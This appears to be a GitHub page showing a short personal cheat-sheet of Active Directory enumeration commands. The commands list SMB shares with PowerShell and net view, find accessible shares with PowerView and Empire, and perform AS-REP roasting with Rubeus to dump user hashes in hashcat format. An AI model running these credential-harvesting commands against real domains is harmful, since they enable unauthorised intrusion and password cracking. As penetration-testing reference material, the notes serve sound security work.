-
Notifications
You must be signed in to change notification settings - Fork 0
/
AD-enum
34 lines (22 loc) · 995 Bytes
/
AD-enum
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
Check hosted shares
In PowerShell: Get-SmbShare
net view
------
Check shares on other system:
$cim = New-CimSession -ComputerName name-of-remote-host
Get-SmbShare -CimSession $cim
Invoke-Command -ComputerName 'dc01','fs01' -ScriptBlock {Get-SmbShare}
net view \\computer /all
To format net view output: net view \\savdaldc02 /all | select -Skip 7 | ?{$_ -match 'disk*'} | %{$_ -match '^(.+?)\s+Disk*'|out-null;$matches[1]}
net view is the best way here but have noted the others for reference
------
Check shares accessible by host
Empire: usemodule powershell/situational_awareness/network/powerview/share_finder ; set CheckShareAccess
Find-DomainShare -CheckShareAccess in PowerView
------
ASREProasting
Check if user has no_preauth_required set
Using rubeus: asreproast /outfile:\Users\user\hash.txt /format:hashcat /user:mr-user /domain:this.local /dc:dc01.this.local
PowerShell Empire: usemodule credentials/rubeus
https://www.akimbocore.com/article/asrep-roasting/
------